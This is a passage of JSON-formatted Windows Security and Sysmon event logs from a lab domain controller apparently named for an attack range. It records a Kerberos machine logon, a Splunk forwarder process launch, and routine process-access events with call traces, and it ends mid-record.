{"EventTime":"2020-08-01 07:54:36","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4624,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":2,"Task":12544,"OpcodeValue":0,"RecordNumber":220397,"ProcessID":864,"ThreadID":1560,"Channel":"Security","Message":"An account was successfully logged on.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-0-0\r\n\tAccount Name:\t\t-\r\n\tAccount Domain:\t\t-\r\n\tLogon ID:\t\t0x0\r\n\r\nLogon Information:\r\n\tLogon Type:\t\t3\r\n\tRestricted Admin Mode:\t-\r\n\tVirtual Account:\t\tNo\r\n\tElevated Token:\t\tYes\r\n\r\nImpersonation Level:\t\tImpersonation\r\n\r\nNew Logon:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-6178966$\r\n\tAccount Domain:\t\tATTACKRANGE.LOCAL\r\n\tLogon ID:\t\t0x4EACF\r\n\tLinked Logon ID:\t\t0x0\r\n\tNetwork Account Name:\t-\r\n\tNetwork Account Domain:\t-\r\n\tLogon GUID:\t\t{77AE7113-A264-8FEA-3CEA-ABED442060A2}\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x0\r\n\tProcess Name:\t\t-\r\n\r\nNetwork Information:\r\n\tWorkstation Name:\t-\r\n\tSource Network Address:\t::1\r\n\tSource Port:\t\t50085\r\n\r\nDetailed Authentication Information:\r\n\tLogon Process:\t\tKerberos\r\n\tAuthentication Package:\tKerberos\r\n\tTransited Services:\t-\r\n\tPackage Name (NTLM only):\t-\r\n\tKey Length:\t\t0\r\n\r\nThis event is generated when a logon session is created. It is generated on the computer that was accessed.\r\n\r\nThe subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\r\n\r\nThe logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).\r\n\r\nThe New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.\r\n\r\nThe network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\r\n\r\nThe impersonation level field indicates the extent to which a process in the logon session can impersonate.\r\n\r\nThe authentication information fields provide detailed information about this specific logon request.\r\n\t- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.\r\n\t- Transited services indicate which intermediate services have participated in this logon request.\r\n\t- Package name indicates which sub-protocol was used among the NTLM protocols.\r\n\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-0-0","SubjectUserName":"-","SubjectDomainName":"-","SubjectLogonId":"0x0","TargetUserSid":"S-1-5-18","TargetUserName":"WIN-DC-6178966$","TargetDomainName":"ATTACKRANGE.LOCAL","TargetLogonId":"0x4eacf","LogonType":"3","LogonProcessName":"Kerberos","AuthenticationPackageName":"Kerberos","WorkstationName":"-","LogonGuid":"{77AE7113-A264-8FEA-3CEA-ABED442060A2}","TransmittedServices":"-","LmPackageName":"-","KeyLength":"0","ProcessName":"-","IpAddress":"::1","IpPort":"50085","ImpersonationLevel":"%%1833","RestrictedAdminMode":"-","TargetOutboundUserName":"-","TargetOutboundDomainName":"-","VirtualAccount":"%%1843","TargetLinkedLogonId":"0x0","ElevatedToken":"%%1842","EventReceivedTime":"2020-08-01 07:54:38","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:54:37","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":2797,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:54:37.628\r\nProcessGuid: {41C8662E-1FBD-5F25-0000-001040EB0400}\r\nProcessId: 4592\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe\r\nFileVersion: 8.0.2\r\nDescription: Windows Print Monitor \r\nProduct: splunk Application\r\nCompany: Splunk Inc.\r\nOriginalFileName: splunk-winprintmon.exe\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe\"\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {41C8662E-1F61-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748\r\nParentProcessGuid: {41C8662E-1F73-5F25-0000-001063C20200}\r\nParentProcessId: 2488\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 07:54:37.628","ProcessGuid":"{41C8662E-1FBD-5F25-0000-001040EB0400}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe","FileVersion":"8.0.2","Description":"Windows Print Monitor ","Product":"splunk Application","Company":"Splunk Inc.","OriginalFileName":"splunk-winprintmon.exe","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe\"","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{41C8662E-1F61-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748","ParentProcessGuid":"{41C8662E-1F73-5F25-0000-001063C20200}","ParentProcessId":"2488","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 07:54:39","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:54:37","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2798,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:54:37.627\r\nSourceProcessGUID: {41C8662E-1F73-5F25-0000-001063C20200}\r\nSourceProcessId: 2488\r\nSourceThreadId: 3076\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {41C8662E-1FBD-5F25-0000-001040EB0400}\r\nTargetProcessId: 4592\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:54:37.627","SourceProcessGUID":"{41C8662E-1F73-5F25-0000-001063C20200}","SourceProcessId":"2488","SourceThreadId":"3076","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{41C8662E-1FBD-5F25-0000-001040EB0400}","TargetProcessId":"4592","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:54:39","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:54:37","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2799,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:54:37.627\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 664\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-1FBD-5F25-0000-001040EB0400}\r\nTargetProcessId: 4592\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:54:37.627","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"664","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-1FBD-5F25-0000-001040EB0400}","TargetProcessId":"4592","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:54:39","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:54:37","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2800,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:54:37.627\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:54:37.627","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:54:39","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:54:37","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2801,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:54:37.627\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:54:37.627","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:54:39","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:54:37","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2802,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:54:37.627\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:54:37.627","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:54:39","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:54:37","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2803,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:54:37.627\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:54:37.627","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:54:39","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:54:37","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2804,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:54:37.627\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: 